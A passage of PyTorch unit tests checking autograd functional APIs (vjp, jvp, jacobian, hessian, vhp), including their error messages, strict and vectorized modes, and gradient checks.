with self.assertRaisesRegex(RuntimeError, "The vector v can only be None if the user-provided function returns"):
res = autogradF.vjp(foo, inp)
with self.assertRaisesRegex(RuntimeError, "The given v should contain a single Tensor."):
res = autogradF.vjp(foo, inp, (torch.ones_like(inp), torch.ones_like(inp)))
with self.assertRaisesRegex(RuntimeError, "v has invalid size: should be torch.Size"):
res = autogradF.vjp(foo, inp, v[:2])
res = autogradF.vjp(foo, inp, v)[1]
self._assert_same_struct(res, inp)
def test_vjp_err_check_strict(self):
def foo(a):
return a.detach()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone()
inp = torch.rand(4)
v = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.vjp(foo, inp, v, strict=True)
res = autogradF.vjp(foo, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "The output of the user-provided function is independent of input 0"):
res = autogradF.vjp(bar, inp, v, strict=True)
res = autogradF.vjp(bar, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
# The Jacobian does not depend on the input
def foo(a):
return a.clone()
inp.requires_grad_()
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function is independent of input 0."):
res = autogradF.vjp(foo, inp, v, create_graph=True, strict=True)
res = autogradF.vjp(foo, inp, v, create_graph=True, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1], v)
def test_vjp_no_grad(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(4, 4)
v = torch.ones(4)
with torch.no_grad():
res = autogradF.vjp(reducer, inputs, v)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
inputs.requires_grad_()
v.requires_grad_()
with torch.no_grad():
res = autogradF.vjp(reducer, inputs, v, create_graph=True)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
def test_vjp_output(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(4, 4)
v = torch.ones(4)
res = autogradF.vjp(reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
def adder(x, y):
return 2 * x + 3 * y
inputs = (torch.rand(2), torch.rand(2))
v = torch.ones(2)
out, vjp_val = autogradF.vjp(adder, inputs, v)
self._assert_same_struct(vjp_val, inputs)
self.assertIsNone(out.grad_fn)
self.assertIsNone(vjp_val[0].grad_fn)
self.assertIsNone(vjp_val[1].grad_fn)
def adder(x, y):
return 2 * x + 3 * y, x + y
inputs = (torch.rand(2), torch.rand(2))
v = (torch.tensor([1., 0.]), torch.tensor([1., 0.]))
out, vjp_val = autogradF.vjp(adder, inputs, v)
self._assert_same_struct(vjp_val, inputs)
self.assertIsNone(out[0].grad_fn)
self.assertIsNone(out[1].grad_fn)
self.assertIsNone(vjp_val[0].grad_fn)
self.assertIsNone(vjp_val[1].grad_fn)
def test_vjp_scalar(self):
def reducer(x):
return x.sum()
inputs = torch.rand(4, 4)
v = torch.ones([])
res = autogradF.vjp(reducer, inputs, v)
self._assert_same_struct(res[0], v)
self._assert_same_struct(res[1], inputs)
res = autogradF.vjp(reducer, inputs)
self._assert_same_struct(res[0], v)
self._assert_same_struct(res[1], inputs)
def expander(x):
return x.unsqueeze(0).repeat(4)
inputs = torch.rand([])
v = torch.ones(4)
res = autogradF.vjp(expander, inputs, v)
self._assert_same_struct(res[0], v)
self._assert_same_struct(res[1], inputs)
def test_vjp_create_graph(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(2, 2, dtype=torch.double)
v = torch.ones(2, dtype=torch.double)
inputs.requires_grad_()
v.requires_grad_()
res = autogradF.vjp(reducer, inputs, v, create_graph=True)
self._assert_same_struct(res[1], inputs)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
gradcheck(lambda inp, v: autogradF.vjp(reducer, inputs, v, create_graph=True), (inputs, v))
gradgradcheck(lambda inp, v: autogradF.vjp(reducer, inputs, v, create_graph=True), (inputs, v))
def adder(x, y):
return 2 * x + 3 * y, x * y
inputs = (torch.rand(2, dtype=torch.double, requires_grad=True),
torch.rand(2, dtype=torch.double, requires_grad=True))
v = (torch.tensor([1., 0.], dtype=torch.double, requires_grad=True),
torch.tensor([1., 0.], dtype=torch.double, requires_grad=True))
gradcheck(lambda *args: autogradF.vjp(adder, args[:2], args[2:], create_graph=True)[1], inputs + v)
gradgradcheck(lambda *args: autogradF.vjp(adder, args[:2], args[2:], create_graph=True)[1], inputs + v)
def foo(*args):
x, y = args[:2]
v = args[2:]
x = x.cos()
val, grad = autogradF.vjp(adder, (x, y), v, create_graph=True)
return val[0].exp() + val[1].exp() + grad[0].exp() + grad[1].exp() + x.exp() + y.exp()
gradcheck(foo, inputs + v)
gradgradcheck(foo, inputs + v)
def test_jvp_err_check(self):
def foo(a):
return 3 * a.narrow(0, 0, 3)
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
inp = torch.rand(4)
v = torch.rand(4)
with self.assertRaisesRegex(TypeError, "The inputs given to jvp must be either a Tensor"):
res = autogradF.jvp(foo, (inp, 2), v)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to jvp must"):
res = autogradF.jvp(bar, inp, v)
with self.assertRaisesRegex(RuntimeError, "The vector v can only be None if the input to the user-provided function"):
res = autogradF.jvp(foo, inp)
with self.assertRaisesRegex(RuntimeError, "The given v should contain a single Tensor."):
res = autogradF.jvp(foo, inp, (v, v))
with self.assertRaisesRegex(RuntimeError, "v has invalid size: should be torch.Size"):
res = autogradF.jvp(foo, inp, v[:2])
res = autogradF.jvp(foo, inp, v)[1]
self._assert_same_struct(res, foo(inp))
def test_jvp_err_check_strict(self):
def foo(a):
return a.detach()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone()
inp = torch.rand(4)
v = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.jvp(foo, inp, v, strict=True)
res = autogradF.jvp(foo, inp, v, strict=False)
self._assert_same_struct(res[1], res[0])
self.assertEqual(res[1].abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "The output of the user-provided function is independent of input 0"):
res = autogradF.jvp(bar, inp, v, strict=True)
res = autogradF.jvp(bar, inp, v, strict=False)
self._assert_same_struct(res[1], res[0])
self.assertEqual(res[1].abs().sum(), 0.)
# The Jacobian does not depend on the input
def foo(a):
return a.clone()
inp.requires_grad_()
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function is independent of input 0."):
res = autogradF.jvp(foo, inp, v, create_graph=True, strict=True)
res = autogradF.jvp(foo, inp, v, create_graph=True, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1], v)
def test_jvp_no_grad(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
with torch.no_grad():
res = autogradF.jvp(reducer, inputs, v)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
inputs.requires_grad_()
v.requires_grad_()
with torch.no_grad():
res = autogradF.jvp(reducer, inputs, v, create_graph=True)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
def test_jvp_output(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.jvp(reducer, inputs, v)
self._assert_same_struct(res[1], res[0])
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
def adder(x, y):
return 2 * x + 3 * y
inputs = (torch.rand(2), torch.rand(2))
v = (torch.ones(2), torch.ones(2))
out, jvp_val = autogradF.jvp(adder, inputs, v)
self._assert_same_struct(jvp_val, out)
self.assertIsNone(out.grad_fn)
self.assertIsNone(jvp_val[0].grad_fn)
self.assertIsNone(jvp_val[1].grad_fn)
def adder(x, y):
return 2 * x + 3 * y, x + y
inputs = (torch.rand(2), torch.rand(2))
v = (torch.tensor([1., 0.]), torch.tensor([1., 0.]))
out, jvp_val = autogradF.jvp(adder, inputs, v)
self._assert_same_struct(jvp_val, out)
self.assertIsNone(out[0].grad_fn)
self.assertIsNone(out[1].grad_fn)
self.assertIsNone(jvp_val[0].grad_fn)
self.assertIsNone(jvp_val[1].grad_fn)
def test_jvp_scalar(self):
def reducer(x):
return x.sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.jvp(reducer, inputs, v)
self._assert_same_struct(res[0], torch.zeros([]))
self._assert_same_struct(res[1], res[0])
def expander(x):
return x.unsqueeze(0).repeat(4)
inputs = torch.rand([])
v = torch.ones([])
res = autogradF.jvp(expander, inputs, v)
self._assert_same_struct(res[0], torch.zeros(4))
self._assert_same_struct(res[1], res[0])
res = autogradF.jvp(expander, inputs)
self._assert_same_struct(res[0], torch.zeros(4))
self._assert_same_struct(res[1], res[0])
def test_jvp_create_graph(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(2, 2, dtype=torch.double)
v = torch.ones(2, 2, dtype=torch.double)
inputs.requires_grad_()
v.requires_grad_()
res = autogradF.jvp(reducer, inputs, v, create_graph=True)
self._assert_same_struct(res[1], res[0])
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
gradcheck(lambda inp, v: autogradF.jvp(reducer, inp, v, create_graph=True), (inputs, v))
gradgradcheck(lambda inp, v: autogradF.jvp(reducer, inp, v, create_graph=True), (inputs, v))
def adder(x, y):
return 2 * x + 3 * y, x * y
inputs = (torch.rand(2, dtype=torch.double, requires_grad=True),
torch.rand(2, dtype=torch.double, requires_grad=True))
v = (torch.tensor([1., 0.], dtype=torch.double, requires_grad=True),
torch.tensor([1., 0.], dtype=torch.double, requires_grad=True))
gradcheck(lambda *args: autogradF.jvp(adder, args[:2], args[2:], create_graph=True)[1], inputs + v)
gradgradcheck(lambda *args: autogradF.jvp(adder, args[:2], args[2:], create_graph=True)[1], inputs + v)
def foo(*args):
x, y = args[:2]
v = args[2:]
x = x.cos()
val, grad = autogradF.jvp(adder, (x, y), v, create_graph=True)
return val[0].exp() + val[1].exp() + grad[0].exp() + grad[1].exp() + x.exp() + y.exp()
gradcheck(foo, inputs + v)
gradgradcheck(foo, inputs + v)
def _test_construct_standard_basis_for(self, inputs):
numels = tuple(tensor.numel() for tensor in inputs)
results = autogradF._construct_standard_basis_for(inputs, numels)
for result, inp in zip(results, inputs):
self.assertEqual(result.dtype, inp.dtype)
self.assertEqual(result.device, inp.device)
results = torch.cat([result.to(device='cpu', dtype=torch.float)
for result in results], dim=1)
expected = torch.eye(results[0].shape[0], dtype=torch.float)
self.assertEqual(results, expected)
def test_construct_standard_basis_for(self):
test_cases = [
(torch.randn(2, 3),),
(torch.randn(1),),
(torch.randn([]),),
(torch.randn(1), torch.randn([]), torch.randn([])),
(torch.randn(2), torch.randn(3), torch.randn([])),
(torch.randn(2), torch.randn([]), torch.randn(3)),
(torch.randn(2, 3), torch.randn(3), torch.randn(3, 4, 2)),
(torch.randn(2, dtype=torch.float64), torch.randn(3, dtype=torch.float32)),
]
for inputs in test_cases:
self._test_construct_standard_basis_for(inputs)
@unittest.skipIf(not TEST_CUDA, "test requires CUDA")
def test_construct_standard_basis_for_cuda(self):
test_cases = [
(torch.randn(2), torch.randn(3, device='cuda')),
(torch.randn(3, device='cuda'), torch.randn(2)),
]
for inputs in test_cases:
self._test_construct_standard_basis_for(inputs)
def _test_vectorize_raises_no_warnings(self, api):
# vmap is an experimental prototype. When someone calls torch.vmap,
# it raises a python warning. This test checks that
# autogradF.{jacobian, hessian} don't raise that experimental prototype
# warning; it is not nice for a public-facing API to raise a warning
# no matter how it is called.
def foo(a):
return (a ** 2).sum()
x = torch.randn(3)
with warnings.catch_warnings(record=True) as wa:
result = api(foo, x, vectorize=True)
self.assertEqual(len(wa), 0)
def test_jacobian_vectorize_raises_no_warnings(self):
return self._test_vectorize_raises_no_warnings(autogradF.jacobian)
def test_hessian_vectorize_raises_no_warnings(self):
return self._test_vectorize_raises_no_warnings(autogradF.hessian)
def _test_jacobian_err_check(self, vectorize):
def foo(a):
return 3 * a.narrow(0, 0, 3)
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
inp = torch.rand(4)
with self.assertRaisesRegex(TypeError, "The inputs given to jacobian must be either a Tensor"):
res = autogradF.jacobian(foo, (inp, 2), vectorize=vectorize)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to jacobian must"):
res = autogradF.jacobian(bar, inp, vectorize=vectorize)
res = autogradF.jacobian(foo, inp, vectorize=vectorize)
self._assert_interleaved_struct(res, foo(inp), inp)
def foo(a, b):
return b, 3 * a.narrow(0, 0, 3)
inp = (torch.rand(4), torch.rand(5))
res = autogradF.jacobian(foo, inp, vectorize=vectorize)
self._assert_interleaved_struct(res, foo(*inp), inp)
def test_jacobian_err_check(self):
return self._test_jacobian_err_check(vectorize=False)
def test_jacobian_err_check_vectorize(self):
return self._test_jacobian_err_check(vectorize=True)
def test_jacobian_err_check_strict(self):
def foo(a):
return a.detach()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone()
inp = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.jacobian(foo, inp, strict=True)
res = autogradF.jacobian(foo, inp, strict=False)
self._assert_interleaved_struct(res, foo(inp), inp)
self.assertEqual(res.abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function is independent of input 0."):
res = autogradF.jacobian(bar, inp, strict=True)
res = autogradF.jacobian(bar, inp, strict=False)
self._assert_interleaved_struct(res, foo(inp), inp)
self.assertEqual(res.abs().sum(), 0.)
# The Jacobian does not depend on the input
def foo(a):
return a.clone()
inp.requires_grad_()
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function is independent of input 0."):
res = autogradF.jacobian(foo, inp, create_graph=True, strict=True)
res = autogradF.jacobian(foo, inp, create_graph=True, strict=False)
self._assert_interleaved_struct(res, inp, inp)
self.assertEqual(res, torch.eye(4))
def test_jacobian_err_check_strict_vectorize(self):
def foo(x):
return x
inp = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "not supported together"):
res = autogradF.jacobian(foo, inp, strict=True, vectorize=True)
def test_jacobian_no_grad(self):
def exp_reducer(x):
return x.exp().sum(dim=1)
inputs = torch.rand(4, 4)
with torch.no_grad():
res = autogradF.jacobian(exp_reducer, inputs)
self.assertIsNone(res.grad_fn)
self.assertNotEqual(res, torch.zeros(4, 4))
with torch.no_grad():
res = autogradF.jacobian(exp_reducer, inputs, create_graph=True)
self.assertIsNotNone(res.grad_fn)
self.assertNotEqual(res, torch.zeros(4, 4))
def _test_jacobian_output(self, vectorize):
def exp_reducer(x):
return x.exp().sum(dim=1)
inputs = torch.rand(4, 4)
res = autogradF.jacobian(exp_reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, exp_reducer(inputs), inputs)
self.assertIsNone(res.grad_fn)
def identity(x):
return x.clone()
inputs = torch.rand(4)
res = autogradF.jacobian(identity, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, identity(inputs), inputs)
self.assertIsNone(res.grad_fn)
self.assertEqual(res, torch.eye(4))
def add_exp_reducer(x, y):
return (x + y.exp()).sum(dim=1)
inputs = (torch.rand(4, 4), torch.rand(4, 4))
res = autogradF.jacobian(add_exp_reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, add_exp_reducer(*inputs), inputs)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
def test_jacobian_output(self):
self._test_jacobian_output(vectorize=False)
def test_jacobian_output_vectorize(self):
self._test_jacobian_output(vectorize=True)
def _test_jacobian_scalar(self, vectorize):
def reducer(x):
return x.sum()
inputs = torch.rand(4, 4)
res = autogradF.jacobian(reducer, inputs, vectorize=vectorize)
self._assert_same_struct(res, inputs)
def expander(x):
return x.unsqueeze(0).repeat(4)
inputs = torch.rand([])
res = autogradF.jacobian(expander, inputs, vectorize=vectorize)
self._assert_same_struct(res, torch.zeros(4))
def test_jacobian_scalar(self):
self._test_jacobian_scalar(vectorize=False)
def test_jacobian_scalar_vectorize(self):
self._test_jacobian_scalar(vectorize=True)
def _test_jacobian_create_graph(self, vectorize):
def exp_reducer(x):
return x.exp().sum(dim=1)
inputs = torch.rand(4, 4, dtype=torch.double, requires_grad=True)
res = autogradF.jacobian(exp_reducer, inputs, create_graph=True, vectorize=vectorize)
self._assert_interleaved_struct(res, exp_reducer(inputs), inputs)
self.assertIsNotNone(res.grad_fn)
gradcheck(lambda inp: autogradF.jacobian(exp_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
gradgradcheck(lambda inp: autogradF.jacobian(exp_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
def add_exp_reducer(x, y):
return (x + y).exp().sum(dim=1)
inputs = (torch.rand(4, 4, dtype=torch.double, requires_grad=True),
torch.rand(4, 4, dtype=torch.double, requires_grad=True))
res = autogradF.jacobian(add_exp_reducer, inputs, create_graph=True, vectorize=vectorize)
self._assert_interleaved_struct(res, add_exp_reducer(*inputs), inputs)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
gradcheck(lambda *inp: autogradF.jacobian(add_exp_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
gradgradcheck(lambda *inp: autogradF.jacobian(add_exp_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
def foo(x, y):
x = x.cos()
val, jac = autogradF.jacobian(add_exp_reducer, (x, y), create_graph=True, vectorize=vectorize)
res = val[0].exp().sum() + val[1].exp().sum() + jac[0].exp().sum()
res = res + jac[1].exp().sum() + x.exp().sum() + y.exp().sum()
return res
gradcheck(foo, inputs)
gradgradcheck(foo, inputs)
def test_jacobian_create_graph(self):
self._test_jacobian_create_graph(vectorize=False)
def test_jacobian_create_graph_vectorize(self):
self._test_jacobian_create_graph(vectorize=True)
def _check_jacobian_vectorize_correctness(self, f, inputs, test_forward_ad=True):
expected = autogradF.jacobian(f, inputs, vectorize=False)
result_backward_mode = autogradF.jacobian(f, inputs, vectorize=True)
self.assertEqual(result_backward_mode, expected)
if test_forward_ad:
result_forward_mode = autogradF.jacobian(f, inputs, strategy="forward-mode", vectorize=True)
self.assertEqual(result_forward_mode, expected)
def test_jacobian_vectorize_correctness_simple(self):
def f(x):
return 3 * x ** 2
x = torch.randn(2, 3, 5)
self._check_jacobian_vectorize_correctness(f, x)
def test_jacobian_vectorize_correctness_multi_input(self):
def f(x, y):
return (x.cos() * x) @ y.sin()
x = torch.randn(2, 3)
y = torch.randn(3, 5)
self._check_jacobian_vectorize_correctness(f, (x, y))
def test_jacobian_vectorize_correctness_multi_input_multi_output(self):
def f(x, y):
return (x * x) @ y, x @ (x.sum(1) * y), y.sum()
x = torch.randn(5, 3)
y = torch.randn(3, 5)
self._check_jacobian_vectorize_correctness(f, (x, y))
def test_jacobian_vectorize_correctness_unrelated_outputs(self):
def f(x, y):
return x, y, x, y
x = torch.randn(2)
y = torch.randn(3)
self._check_jacobian_vectorize_correctness(f, (x, y))
def test_jacobian_vectorize_correctness_zero_dim(self):
# zero-dim output
def f(x, y):
return x.sum(), y.sum(), x * y
x = torch.randn(3)
y = torch.randn(3)
self._check_jacobian_vectorize_correctness(f, (x, y))
# zero-dim input
def g(x):
return torch.stack([x, x, x])
x = torch.randn([])
self._check_jacobian_vectorize_correctness(g, x)
# Mixed zero-dim input / zero-dim output
def h(x, y):
return y.sum(), x * y
x = torch.randn([])
y = torch.randn(1)
self._check_jacobian_vectorize_correctness(h, (x, y))
@unittest.skipIf(not TEST_CUDA, "test requires CUDA")
def test_jacobian_vectorize_correctness_different_devices(self):
def f(x, y):
return x * y, (x * y).cuda()
x = torch.randn(3)
y = torch.randn(3)
self._check_jacobian_vectorize_correctness(f, (x, y))
def test_jacobian_vectorize_correctness_different_dtype(self):
def f(x, y):
return (x * y).float(), (x * y).double()
x = torch.randn(3)
y = torch.randn(3)
# The Jacobian computed using forward AD has the dtype of the output
# but the Jacobian computed with reverse AD has dtype of input
self._check_jacobian_vectorize_correctness(f, (x, y), test_forward_ad=False)
def _check_hessian_vectorize_correctness(self, f, inputs):
expected = autogradF.hessian(f, inputs, vectorize=False)
result = autogradF.hessian(f, inputs, vectorize=True)
self.assertEqual(result, expected)
result_forward_mode = autogradF.hessian(f, inputs, outer_jacobian_strategy="forward-mode", vectorize=True)
self.assertEqual(result_forward_mode, expected)
def test_hessian_vectorize_correctness_simple(self):
def f(x):
return (3 * x ** 2).sum()
x = torch.randn(2, 3, 5)
self._check_hessian_vectorize_correctness(f, x)
def test_hessian_vectorize_correctness_multi_input(self):
def f(x, y, z):
return ((x.relu() * x) @ y.sin() @ z).sum()
x = torch.randn(2, 3)
y = torch.randn(3, 5)
z = torch.randn(5, 5)
self._check_hessian_vectorize_correctness(f, (x, y, z))
def test_hessian_vectorize_correctness_unrelated_outputs(self):
# output unrelated to one input
def f(x, y):
return (x ** 2).sum()
x = torch.randn(2)
y = torch.randn(3)
self._check_hessian_vectorize_correctness(f, (x, y))
# output unrelated to all inputs
def f(x, y):
return torch.ones([])
x = torch.randn(2)
y = torch.randn(3)
self._check_hessian_vectorize_correctness(f, (x, y))
def _test_hessian_err_check(self, vectorize):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
def bar2(a):
return 3 * a.narrow(0, 0, 3)
def bar3(a):
return 3 * a.narrow(0, 0, 3), 3 * a.narrow(0, 0, 3)
inp = torch.rand(4)
with self.assertRaisesRegex(TypeError, "The inputs given to hessian must be either a Tensor"):
res = autogradF.hessian(foo, (inp, 2), vectorize=vectorize)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to hessian must"):
res = autogradF.hessian(bar, inp, vectorize=vectorize)
err_msg_out = "The Tensor returned by the function given to hessian should contain a single element"
with self.assertRaisesRegex(RuntimeError, err_msg_out):
res = autogradF.hessian(bar2, inp, vectorize=vectorize)
with self.assertRaisesRegex(RuntimeError, "The function given to hessian should return a single Tensor"):
res = autogradF.hessian(bar3, inp, vectorize=vectorize)
res = autogradF.hessian(foo, inp, vectorize=vectorize)
self._assert_interleaved_struct(res, inp, inp)
def foo(a, b):
return (3 * b.narrow(0, 0, 3) * a.narrow(0, 0, 3)).sum()
inp = (torch.rand(4), torch.rand(5))
res = autogradF.hessian(foo, inp, vectorize=vectorize)
self._assert_interleaved_struct(res, inp, inp)
def test_hessian_err_check(self):
self._test_hessian_err_check(vectorize=False)
def test_hessian_err_check_vectorize(self):
self._test_hessian_err_check(vectorize=True)
def test_hessian_err_check_strict(self):
def foo(a):
return a.detach().sum()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone().sum()
def bar2(a):
# A Linear function for which the jacobian is independent of the input
return (3 * a).sum()
inp = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.hessian(foo, inp, strict=True)
res = autogradF.hessian(foo, inp, strict=False)
self._assert_interleaved_struct(res, inp, inp)
self.assertEqual(res.abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function with respect to input 0"):
res = autogradF.hessian(bar, inp, strict=True)
res = autogradF.hessian(bar, inp, strict=False)
self._assert_interleaved_struct(res, inp, inp)
self.assertEqual(res.abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function with respect to input 0 is"):
res = autogradF.hessian(bar2, inp, strict=True)
res = autogradF.hessian(bar2, inp, strict=False)
self._assert_interleaved_struct(res, inp, inp)
self.assertEqual(res.abs().sum(), 0.)
def test_hessian_err_check_strict_vectorize(self):
def foo(x):
return (x ** 3).sum()
inp = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "not supported together"):
res = autogradF.hessian(foo, inp, strict=True, vectorize=True)
def test_hessian_no_grad(self):
def pow_reducer(x):
return x.pow(3).sum()
inputs = torch.rand(2, 2)
with torch.no_grad():
res = autogradF.hessian(pow_reducer, inputs)
self.assertIsNone(res[0][0].grad_fn)
self.assertIsNone(res[0][1].grad_fn)
self.assertIsNone(res[1][0].grad_fn)
self.assertIsNone(res[1][1].grad_fn)
self.assertNotEqual(res, torch.zeros(2, 2, 2))
with torch.no_grad():
res = autogradF.hessian(pow_reducer, inputs, create_graph=True)
self.assertIsNotNone(res[0][0].grad_fn)
self.assertIsNotNone(res[0][1].grad_fn)
self.assertIsNotNone(res[1][0].grad_fn)
self.assertIsNotNone(res[1][1].grad_fn)
self.assertNotEqual(res, torch.zeros(2, 2, 2))
def _test_hessian_output(self, vectorize):
def pow_reducer(x):
return x.pow(3).sum()
inputs = torch.rand(2, 2)
res = autogradF.hessian(pow_reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
self.assertIsNone(res.grad_fn)
def add_pow_reducer(x, y):
return (x + y).pow(3).sum()
inputs = (torch.rand(2, 2), torch.rand(2, 2))
res = autogradF.hessian(add_pow_reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
self.assertIsNone(res[0][0].grad_fn)
self.assertIsNone(res[0][1].grad_fn)
self.assertIsNone(res[1][0].grad_fn)
self.assertIsNone(res[1][1].grad_fn)
def test_hessian_output(self):
self._test_hessian_output(vectorize=False)
def test_hessian_output_vectorize(self):
self._test_hessian_output(vectorize=True)
def _test_hessian_scalar(self, vectorize):
def reducer(x):
return x.sum()
inputs = torch.rand(4, 4)
res = autogradF.hessian(reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
inputs = torch.rand([])
res = autogradF.hessian(reducer, inputs, vectorize=vectorize)
self._assert_same_struct(res, inputs)
def bad_reducer(x):
return x.sum().view(1, 1, 1)
inputs = torch.rand(4, 4)
res = autogradF.hessian(bad_reducer, inputs, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
def test_hessian_scalar(self):
return self._test_hessian_scalar(vectorize=False)
def test_hessian_scalar_vectorize(self):
return self._test_hessian_scalar(vectorize=True)
def _test_hessian_create_graph(self, vectorize):
def pow_reducer(x):
return x.pow(3).sum()
inputs = torch.rand(2, 2, dtype=torch.double, requires_grad=True)
res = autogradF.hessian(pow_reducer, inputs, create_graph=True, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
self.assertIsNotNone(res.grad_fn)
gradcheck(lambda inp: autogradF.hessian(pow_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
gradgradcheck(lambda inp: autogradF.hessian(pow_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
def add_pow_reducer(x, y):
return (x + y).pow(3).sum()
inputs = (torch.rand(2, 2, dtype=torch.double, requires_grad=True),
torch.rand(2, 2, dtype=torch.double, requires_grad=True))
res = autogradF.hessian(add_pow_reducer, inputs, create_graph=True, vectorize=vectorize)
self._assert_interleaved_struct(res, inputs, inputs)
self.assertIsNotNone(res[0][0].grad_fn)
self.assertIsNotNone(res[0][1].grad_fn)
self.assertIsNotNone(res[1][0].grad_fn)
self.assertIsNotNone(res[1][1].grad_fn)
def flatten(inp):
return tuple(el_lvl2 for el_lvl1 in inp for el_lvl2 in el_lvl1)
gradcheck(lambda *inp: flatten(autogradF.hessian(add_pow_reducer, inp, create_graph=True, vectorize=vectorize)), inputs)
gradgradcheck(lambda *inp: flatten(autogradF.hessian(add_pow_reducer, inp, create_graph=True, vectorize=vectorize)), inputs)
def foo(x, y):
x = x.cos()
val, hess = autogradF.hessian(add_pow_reducer, (x, y), create_graph=True, vectorize=vectorize)
res = val[0].cos().sum() + val[1].cos().sum() + hess[0].cos().sum()
res = res + hess[1].cos().sum() + x.cos().sum() + y.cos().sum()
return res
gradcheck(foo, inputs)
gradgradcheck(foo, inputs)
def test_hessian_create_graph(self):
self._test_hessian_create_graph(vectorize=False)
def test_hessian_create_graph_vectorize(self):
self._test_hessian_create_graph(vectorize=True)
def test_vhp_err_check(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
def bar2(a):
return 3 * a.narrow(0, 0, 3)
inp = torch.rand(4)
v = torch.rand(4)
with self.assertRaisesRegex(TypeError, "The inputs given to vhp must be either a Tensor"):
res = autogradF.vhp(foo, (inp, 2), v)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to vhp must"):
res = autogradF.vhp(bar, inp, v)
err_msg_out = "The Tensor returned by the function given to vhp should contain a single element"
with self.assertRaisesRegex(RuntimeError, err_msg_out):
res = autogradF.vhp(bar2, inp, v)
with self.assertRaisesRegex(RuntimeError, "v has invalid size:"):
res = autogradF.vhp(foo, inp, torch.rand(5))
with self.assertRaisesRegex(TypeError, "The v given to vhp must be either a Tensor or a tuple of Tensors"):
res = autogradF.vhp(foo, inp, (v, 2))
res = autogradF.vhp(foo, inp, v)
self._assert_same_struct(res[1], inp)
def foo(a, b):
return (3 * b.narrow(0, 0, 3) * a.narrow(0, 0, 3)).sum()
inp = (torch.rand(4), torch.rand(5))
v = (torch.rand(4), torch.rand(5))
res = autogradF.vhp(foo, inp, v)
